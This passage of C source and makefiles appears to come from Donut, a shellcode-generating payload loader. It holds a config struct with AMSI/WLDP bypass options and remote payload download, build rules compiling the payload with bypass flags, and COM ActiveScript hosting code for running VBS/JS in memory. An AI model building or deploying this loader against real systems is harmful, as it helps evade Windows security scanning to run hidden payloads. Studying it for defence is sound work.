68 | #define DONUT_MODULE_EXE 4 // Unmanaged EXE | |
69 | #define DONUT_MODULE_VBS 5 // VBScript | |
70 | #define DONUT_MODULE_JS 6 // JavaScript or JScript | |
71 | #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded | |
72 | ||
73 | // instance type | |
74 | #define DONUT_INSTANCE_PIC 1 // Self-contained | |
75 | #define DONUT_INSTANCE_URL 2 // Download from remote server | |
76 | ||
77 | // AMSI/WLDP options | |
78 | #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP | |
79 | #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running | |
80 | #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running | |
81 | ||
82 | // apparently C# can support 2^16 or 65,536 parameters | |
83 | // we support up to eight for now :) | |
84 | #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method | |
85 | #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names | |
86 | #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance | |
87 | #define DONUT_MAX_URL 256 | |
88 | #define DONUT_MAX_MODNAME 8 | |
89 | #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok | |
90 | #define DONUT_VER_LEN 32 | |
91 | #define DONUT_DOMAIN_LEN 8 | |
92 | ||
typedef struct _DONUT_CONFIG {
    // Caller-supplied settings. Every string member is a fixed-size,
    // NUL-terminated buffer with no separate length field: whoever fills
    // it in must stay within the declared size (DONUT_MAX_NAME / DONUT_MAX_URL).
    int      arch;                       // target architecture for shellcode (DONUT_ARCH_*)
    int      bypass;                     // bypass option for AMSI/WLDP (DONUT_BYPASS_*)
    char     domain[DONUT_MAX_NAME];     // name of domain to create for assembly
    char     cls[DONUT_MAX_NAME];        // name of class and optional namespace
    char     method[DONUT_MAX_NAME];     // name of method to execute
    char     param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
    char     file[DONUT_MAX_NAME];       // assembly to create module from
    char     url[DONUT_MAX_URL];         // points to root path of where module will be on remote http server
    char     runtime[DONUT_MAX_NAME];    // runtime version to use.
    char     modname[DONUT_MAX_NAME];    // name of module written to disk

    // Module, instance and PIC buffers. Each void* is paired with a *_len
    // member giving its size. NOTE(review): ownership is not stated here;
    // presumably DonutCreate allocates these and DonutDelete releases them
    // (both declared below) — confirm in the implementation before freeing
    // them yourself.
    int      mod_type;                   // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL (DONUT_MODULE_*)
    uint64_t mod_len;                    // size of DONUT_MODULE
    void     *mod;                       // points to donut module

    int      inst_type;                  // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
    uint64_t inst_len;                   // size of DONUT_INSTANCE
    void     *inst;                      // points to donut instance

    uint64_t pic_len;                    // size of shellcode
    void     *pic;                       // points to PIC/shellcode
} DONUT_CONFIG, *PDONUT_CONFIG;
116 | ||
117 | #ifdef __cplusplus | |
118 | extern "C" { | |
119 | #endif | |
120 | ||
121 | int DonutCreate(PDONUT_CONFIG); | |
122 | int DonutDelete(PDONUT_CONFIG); | |
123 | ||
124 | #ifdef __cplusplus | |
125 | } | |
126 | #endif | |
127 | ||
128 | #endif |
0 | x64: | |
1 | x86_64-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe | |
2 | exe2h/exe2h payload.exe | |
3 | x86: | |
4 | i686-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe | |
5 | exe2h/exe2h payload.exe | |
6 | debug_x64: | |
7 | x86_64-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe | |
8 | debug_x86: | |
9 | i686-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe | |
10 | clean: | |
11 | rm *.o payload.exe |
0 | payload: | |
1 | cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c | |
2 | link -nologo -order:@order.txt -entry:ThreadProc -fixed -subsystem:console -nodefaultlib payload.obj hash.obj encrypt.obj clib.obj | |
3 | exe2h\exe2h payload.exe | |
4 | debug: | |
5 | cl -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c | |
6 | link -nologo -order:@order.txt -subsystem:console payload.obj hash.obj encrypt.obj clib.obj | |
7 | clean: | |
8 | del *.obj payload.exe |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | // initialize virtual function table | |
static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
    // Fill in the vtable slots of the site object that wraps this instance.
    // lpVtbl must already point at writable storage owned by the caller;
    // only the slots and the two bookkeeping fields are written here.
    MyIActiveScriptSite   *mas = (MyIActiveScriptSite*)this;
    IActiveScriptSiteVtbl *vt  = mas->site.lpVtbl;

    // IUnknown
    vt->QueryInterface      = ADR(LPVOID, ActiveScript_QueryInterface);
    vt->AddRef              = ADR(LPVOID, ActiveScript_AddRef);
    vt->Release             = ADR(LPVOID, ActiveScript_Release);

    // IActiveScriptSite, in vtable order
    vt->GetLCID             = ADR(LPVOID, ActiveScript_GetLCID);
    vt->GetItemInfo         = ADR(LPVOID, ActiveScript_GetItemInfo);
    vt->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
    vt->OnScriptTerminate   = ADR(LPVOID, ActiveScript_OnScriptTerminate);
    vt->OnStateChange       = ADR(LPVOID, ActiveScript_OnStateChange);
    vt->OnScriptError       = ADR(LPVOID, ActiveScript_OnScriptError);
    vt->OnEnterScript       = ADR(LPVOID, ActiveScript_OnEnterScript);
    vt->OnLeaveScript       = ADR(LPVOID, ActiveScript_OnLeaveScript);

    // No outstanding references yet. The owning instance is kept so the
    // callbacks can reach its IIDs (QueryInterface) and API table (GetLCID).
    mas->site.m_cRef = 0;
    mas->inst        = inst;
}
53 | ||
static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
    MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
    int supported;

    DPRINT("IActiveScriptSite::QueryInterface");

    // The out-pointer is mandatory.
    if(ppv == NULL) return E_POINTER;

    // Only IUnknown and IActiveScriptSite are exposed. The IIDs are read
    // from the instance rather than from global constants.
    supported = IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
                IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid);

    if(!supported) {
        *ppv = NULL;
        return E_NOINTERFACE;
    }

    *ppv = (LPVOID)this;
    ActiveScript_AddRef(this);   // the caller owns one reference on success
    return S_OK;
}
72 | ||
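static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
    MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;

    // Return the value produced by the atomic increment instead of
    // re-reading m_cRef afterwards: a Release on another thread between the
    // increment and the re-read would make the returned count stale.
    // Mirrors ActiveScript_Release.
    ULONG ulRefCount = _InterlockedIncrement(&mas->site.m_cRef);

    DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", ulRefCount);

    return ulRefCount;
}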
82 | ||
static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
    MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
    ULONG remaining;

    // Atomically drop one reference and report what is left. Nothing is
    // freed when the count reaches zero: this code never heap-allocates the
    // site (it is reached through mas->site, so presumably it is embedded in
    // the instance — verify in the instance definition).
    remaining = _InterlockedDecrement(&mas->site.m_cRef);

    DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", remaining);
    return remaining;
}
91 | ||
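static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
    LPCOLESTR objectName, DWORD dwReturnMask,
    IUnknown **objPtr, ITypeInfo **ppti)
{
    MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;

    DPRINT("IActiveScriptSite::GetItemInfo");

    // Validate every requested out-pointer before handing out any
    // reference. Previously the ITYPEINFO branch AddRef'd the type info and
    // a NULL objPtr in the following IUNKNOWN branch returned E_POINTER,
    // leaking that reference.
    if((dwReturnMask & SCRIPTINFO_ITYPEINFO) && ppti == NULL) return E_POINTER;
    if((dwReturnMask & SCRIPTINFO_IUNKNOWN) && objPtr == NULL) return E_POINTER;

    // NOTE(review): objectName is not inspected, so every item name the
    // engine asks about resolves to the single mas->wscript object.
    (void)objectName;

    if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
        DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
        // The caller receives its own reference on the type info.
        mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
        *ppti = mas->wscript.lpTypeInfo;
    }

    if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
        DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
        // Likewise one reference on the object itself.
        mas->wscript.lpVtbl->AddRef(&mas->wscript);
        *objPtr = (IUnknown*)&mas->wscript;
    }

    return S_OK;
}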
118 | ||
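static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
    IActiveScriptError *scriptError)
{
    EXCEPINFO ei;
    DWORD     dwSourceContext = 0;
    ULONG     ulLineNumber    = 0;
    LONG      ichCharPosition = 0;
    HRESULT   hr;

    DPRINT("IActiveScriptSite::OnScriptError");

    // The error object is dereferenced below; refuse a missing one instead
    // of faulting (same convention as the E_POINTER checks elsewhere).
    if(scriptError == NULL) return E_POINTER;

    Memset(&ei, 0, sizeof(EXCEPINFO));

    // Only used for diagnostics: description plus line/column of the error.
    DPRINT("IActiveScriptError::GetExceptionInfo");
    hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
    if(hr == S_OK) {
        DPRINT("IActiveScriptError::GetSourcePosition");
        hr = scriptError->lpVtbl->GetSourcePosition(
            scriptError, &dwSourceContext,
            &ulLineNumber, &ichCharPosition);
        if(hr == S_OK) {
            DPRINT("JSError: %ws line[%d:%d]\n",
                ei.bstrDescription, ulLineNumber, ichCharPosition);
        }
    }

    // NOTE(review): the BSTR members GetExceptionInfo fills in
    // (bstrSource, bstrDescription, bstrHelpFile) are never released, so
    // each reported script error leaks them. Releasing them needs
    // SysFreeString, which this code would have to reach through the
    // instance API table (mas->inst->api, as GetLCID does) — confirm it is
    // exposed there before adding the call.
    // The error is only logged; the callback itself always succeeds.
    return S_OK;
}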
146 | ||
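static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
    MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;

    DPRINT("IActiveScriptSite::GetLCID");

    // Guard the out-pointer like QueryInterface and GetItemInfo do rather
    // than writing through NULL.
    if(plcid == NULL) return E_POINTER;

    // The locale comes from the user's default, resolved through the
    // instance API table.
    *plcid = mas->inst->api.GetUserDefaultLCID();
    return S_OK;
}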
154 | ||
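static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
    DPRINT("IActiveScriptSite::GetDocVersionString");

    if(version == NULL) return E_POINTER;

    // This host tracks no document version. Previously S_OK was returned
    // without touching *version, leaving the caller with an uninitialized
    // BSTR; a NULL BSTR is the conventional empty string.
    *version = NULL;
    return S_OK;
}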
160 | ||
static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
    const VARIANT *pvr, const EXCEPINFO *pei)
{
    // End-of-script notification. Neither the result nor any exception
    // information is consumed by this host.
    (void)this;
    (void)pvr;
    (void)pei;

    DPRINT("IActiveScriptSite::OnScriptTerminate");
    return S_OK;
}
168 | ||
static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
    // Engine state transitions are logged only; no host state depends on them.
    (void)this;
    (void)state;

    DPRINT("IActiveScriptSite::OnStateChange");
    return S_OK;
}
174 | ||
static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
    // Engine is about to run script code; nothing to prepare on this side.
    (void)this;

    DPRINT("IActiveScriptSite::OnEnterScript");
    return S_OK;
}
180 | ||
static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
    // Engine has returned from script code; nothing to tear down on this side.
    (void)this;

    DPRINT("IActiveScriptSite::OnLeaveScript");
    return S_OK;
}
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef IACTIVESCRIPT_H | |
32 | #define IACTIVESCRIPT_H | |
33 | ||
34 | #include "../include/donut.h" | |
35 | ||
36 | // required to load and run VBS or JS files | |
37 | typedef struct _IActiveScript IActiveScript; | |
38 | typedef struct _IActiveScriptError IActiveScriptError; | |
39 | typedef struct _IActiveScriptSite IActiveScriptSite; | |
40 | typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow; | |
41 | typedef struct _IActiveScriptParse32 IActiveScriptParse32; | |
42 | typedef struct _IActiveScriptParse64 IActiveScriptParse64; | |
43 | ||
// Engine lifecycle states, passed to the host through
// IActiveScriptSite::OnStateChange and set with IActiveScript::SetScriptState.
// The numeric values are interpreted by the engine, so they must stay as is.
typedef enum tagSCRIPTSTATE {
    SCRIPTSTATE_UNINITIALIZED = 0,
    SCRIPTSTATE_STARTED       = 1,
    SCRIPTSTATE_CONNECTED     = 2,
    SCRIPTSTATE_DISCONNECTED  = 3,
    SCRIPTSTATE_CLOSED        = 4,
    SCRIPTSTATE_INITIALIZED   = 5
} SCRIPTSTATE;
52 | ||
// Per-thread execution state reported by IActiveScript::GetScriptThreadState.
typedef enum tagSCRIPTTHREADSTATE {
    SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
    SCRIPTTHREADSTATE_RUNNING     = 1
} SCRIPTTHREADSTATE;
57 | ||
58 | #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread. | |
59 | #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated. | |
60 | #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads. | |
61 | ||
62 | typedef DWORD SCRIPTTHREADID; | |
63 | ||
64 | #define SCRIPTITEM_ISPERSISTENT 0x00000001 | |
65 | #define SCRIPTITEM_ISVISIBLE 0x00000002 | |
66 | #define SCRIPTITEM_ISSOURCE 0x00000004 | |
67 | #define SCRIPTITEM_GLOBALMEMBERS 0x00000008 | |
68 | #define SCRIPTITEM_EXISTS 0x00000080 | |
69 | #define SCRIPTITEM_MULTIINSTANCE 0x00000100 | |
70 | #define SCRIPTITEM_CODEONLY 0x00000200 | |
71 | ||
72 | #define SCRIPTTEXT_ISPERSISTENT 0x00000001 | |
73 | #define SCRIPTTEXT_ISVISIBLE 0x00000002 | |
74 | #define SCRIPTTEXT_ISEXPRESSION 0x00000020 | |
75 | #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040 | |
76 | #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400 | |
77 | #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \ | |
78 | SCRIPTTEXT_ISVISIBLE | \ | |
79 | SCRIPTTEXT_ISEXPRESSION | \ | |
80 | SCRIPTTEXT_KEEPDEFINITIONS | \ | |
81 | SCRIPTTEXT_ALLOWEXECUTION) | |
82 | ||
83 | #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080 | |
84 | #define SCRIPTINFO_IUNKNOWN 0x00000001 | |
85 | #define SCRIPTINFO_ITYPEINFO 0x00000002 | |
86 | #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO) | |
87 | ||
// Hand-written mirror of the IActiveScript vtable. The slot order is the
// COM ABI: IUnknown's three methods first, then the IActiveScript methods.
// The engine implements this table, so members must not be added, removed
// or reordered — a mismatch silently calls the wrong method.
typedef struct IActiveScriptVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IActiveScript * This,
        /* [in] */ REFIID riid,
        /* [annotation][iid_is][out] */
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IActiveScript * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IActiveScript * This);

    HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
        IActiveScript * This,
        /* [in] */ IActiveScriptSite *pass);

    HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
        IActiveScript * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */ void **ppvObject);

    HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
        IActiveScript * This,
        /* [in] */ SCRIPTSTATE ss);

    HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
        IActiveScript * This,
        /* [out] */ SCRIPTSTATE *pssState);

    HRESULT ( STDMETHODCALLTYPE *Close )(
        IActiveScript * This);

    HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
        IActiveScript * This,
        /* [in] */ LPCOLESTR pstrName,
        /* [in] */ DWORD dwFlags);

    HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
        IActiveScript * This,
        /* [in] */ REFGUID rguidTypeLib,
        /* [in] */ DWORD dwMajor,
        /* [in] */ DWORD dwMinor,
        /* [in] */ DWORD dwFlags);

    HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
        IActiveScript * This,
        /* [in] */ LPCOLESTR pstrItemName,
        /* [out] */ IDispatch **ppdisp);

    HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
        IActiveScript * This,
        /* [out] */ SCRIPTTHREADID *pstidThread);

    HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
        IActiveScript * This,
        /* [in] */ DWORD dwWin32ThreadId,
        /* [out] */ SCRIPTTHREADID *pstidThread);

    HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
        IActiveScript * This,
        /* [in] */ SCRIPTTHREADID stidThread,
        /* [out] */ SCRIPTTHREADSTATE *pstsState);

    HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
        IActiveScript * This,
        /* [in] */ SCRIPTTHREADID stidThread,
        /* [in] */ const EXCEPINFO *pexcepinfo,
        /* [in] */ DWORD dwFlags);

    HRESULT ( STDMETHODCALLTYPE *Clone )(
        IActiveScript * This,
        /* [out] */ IActiveScript **ppscript);

    END_INTERFACE
} IActiveScriptVtbl;
166 | ||
// Interface pointer layout: a single vtable pointer, as COM requires.
// Note the struct tag is forward-typedef'd as IActiveScript above and the
// name given here is ActiveScript; both refer to the same struct.
typedef struct _IActiveScript {
    IActiveScriptVtbl *lpVtbl;
} ActiveScript;
170 | ||
// 32-bit flavour of the IActiveScriptParse vtable. It differs from the
// 64-bit variant below only in the width of dwSourceContextCookie (DWORD
// here, DWORDLONG there); the _WIN64 block at the end of this header picks
// which one IActiveScriptParse resolves to. Slot order is the COM ABI and
// must not change.
typedef struct IActiveScriptParse32Vtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IActiveScriptParse32 * This,
        /* [in] */ REFIID riid,
        /* [annotation][iid_is][out] */
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IActiveScriptParse32 * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IActiveScriptParse32 * This);

    HRESULT ( STDMETHODCALLTYPE *InitNew )(
        IActiveScriptParse32 * This);

    HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
        IActiveScriptParse32 * This,
        /* [in] */ LPCOLESTR pstrDefaultName,
        /* [in] */ LPCOLESTR pstrCode,
        /* [in] */ LPCOLESTR pstrItemName,
        /* [in] */ LPCOLESTR pstrSubItemName,
        /* [in] */ LPCOLESTR pstrEventName,
        /* [in] */ LPCOLESTR pstrDelimiter,
        /* [in] */ DWORD dwSourceContextCookie,
        /* [in] */ ULONG ulStartingLineNumber,
        /* [in] */ DWORD dwFlags,
        /* [out] */ BSTR *pbstrName,
        /* [out] */ EXCEPINFO *pexcepinfo);

    HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
        IActiveScriptParse32 * This,
        /* [in] */ LPCOLESTR pstrCode,
        /* [in] */ LPCOLESTR pstrItemName,
        /* [in] */ IUnknown *punkContext,
        /* [in] */ LPCOLESTR pstrDelimiter,
        /* [in] */ DWORD dwSourceContextCookie,
        /* [in] */ ULONG ulStartingLineNumber,
        /* [in] */ DWORD dwFlags,
        /* [out] */ VARIANT *pvarResult,
        /* [out] */ EXCEPINFO *pexcepinfo);

    END_INTERFACE
} IActiveScriptParse32Vtbl;
217 | ||
// Interface pointer layout for the 32-bit parse interface (vtable pointer only).
typedef struct _IActiveScriptParse32 {
    IActiveScriptParse32Vtbl *lpVtbl;
} ActiveScriptParse32;
221 | ||
// 64-bit flavour of the IActiveScriptParse vtable: identical to the 32-bit
// one above except that dwSourceContextCookie is a DWORDLONG. Selected for
// IActiveScriptParse by the _WIN64 block at the end of this header. Slot
// order is the COM ABI and must not change.
typedef struct IActiveScriptParse64Vtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IActiveScriptParse64 * This,
        /* [in] */ REFIID riid,
        /* [annotation][iid_is][out] */
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IActiveScriptParse64 * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IActiveScriptParse64 * This);

    HRESULT ( STDMETHODCALLTYPE *InitNew )(
        IActiveScriptParse64 * This);

    HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
        IActiveScriptParse64 *This,
        /* [in] */ LPCOLESTR pstrDefaultName,
        /* [in] */ LPCOLESTR pstrCode,
        /* [in] */ LPCOLESTR pstrItemName,
        /* [in] */ LPCOLESTR pstrSubItemName,
        /* [in] */ LPCOLESTR pstrEventName,
        /* [in] */ LPCOLESTR pstrDelimiter,
        /* [in] */ DWORDLONG dwSourceContextCookie,
        /* [in] */ ULONG ulStartingLineNumber,
        /* [in] */ DWORD dwFlags,
        /* [out] */ BSTR *pbstrName,
        /* [out] */ EXCEPINFO *pexcepinfo);

    HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
        IActiveScriptParse64 *This,
        /* [in] */ LPCOLESTR pstrCode,
        /* [in] */ LPCOLESTR pstrItemName,
        /* [in] */ IUnknown *punkContext,
        /* [in] */ LPCOLESTR pstrDelimiter,
        /* [in] */ DWORDLONG dwSourceContextCookie,
        /* [in] */ ULONG ulStartingLineNumber,
        /* [in] */ DWORD dwFlags,
        /* [out] */ VARIANT *pvarResult,
        /* [out] */ EXCEPINFO *pexcepinfo);

    END_INTERFACE
} IActiveScriptParse64Vtbl;
268 | ||
// Interface pointer layout for the 64-bit parse interface (vtable pointer only).
typedef struct _IActiveScriptParse64 {
    IActiveScriptParse64Vtbl *lpVtbl;
} ActiveScriptParse64;
272 | ||
// IActiveScriptSiteWindow vtable: IUnknown's three slots followed by the two
// window-related host callbacks. Slot order is the COM ABI and must not change.
typedef struct _IActiveScriptSiteWindowVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IActiveScriptSiteWindow * This,
        /* [in] */ REFIID riid,
        /* [annotation][iid_is][out] */
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IActiveScriptSiteWindow * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IActiveScriptSiteWindow * This);

    HRESULT ( STDMETHODCALLTYPE *GetWindow )(
        IActiveScriptSiteWindow * This,
        /* [out] */ HWND *phwnd);

    HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
        IActiveScriptSiteWindow * This,
        /* [in] */ BOOL fEnable);

    END_INTERFACE
} IActiveScriptSiteWindowVtbl;
298 | ||
// Interface pointer layout for IActiveScriptSiteWindow (vtable pointer only).
typedef struct _IActiveScriptSiteWindow {
    IActiveScriptSiteWindowVtbl *lpVtbl;
} ActiveScriptSiteWindow;
302 | ||
// IActiveScriptError vtable, the object the engine passes to
// IActiveScriptSite::OnScriptError. The host calls GetExceptionInfo and
// GetSourcePosition through it. Slot order is the COM ABI and must not change.
typedef struct _IActiveScriptErrorVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IActiveScriptError * This,
        /* [in] */ REFIID riid,
        /* [annotation][iid_is][out] */
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IActiveScriptError * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IActiveScriptError * This);

    // Fills an EXCEPINFO whose BSTR members are allocated by the engine and
    // become the caller's responsibility to release.
    /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
        IActiveScriptError * This,
        /* [out] */ EXCEPINFO *pexcepinfo);

    HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
        IActiveScriptError * This,
        /* [out] */ DWORD *pdwSourceContext,
        /* [out] */ ULONG *pulLineNumber,
        /* [out] */ LONG *plCharacterPosition);

    HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
        IActiveScriptError * This,
        /* [out] */ BSTR *pbstrSourceLine);

    END_INTERFACE
} IActiveScriptErrorVtbl;
334 | ||
// Interface pointer layout for IActiveScriptError (vtable pointer only).
typedef struct _IActiveScriptError {
    IActiveScriptErrorVtbl *lpVtbl;
} ActiveScriptError;
338 | ||
// IActiveScriptSite vtable — the host interface this code implements.
// ActiveScript_New fills these slots with the ActiveScript_* functions and
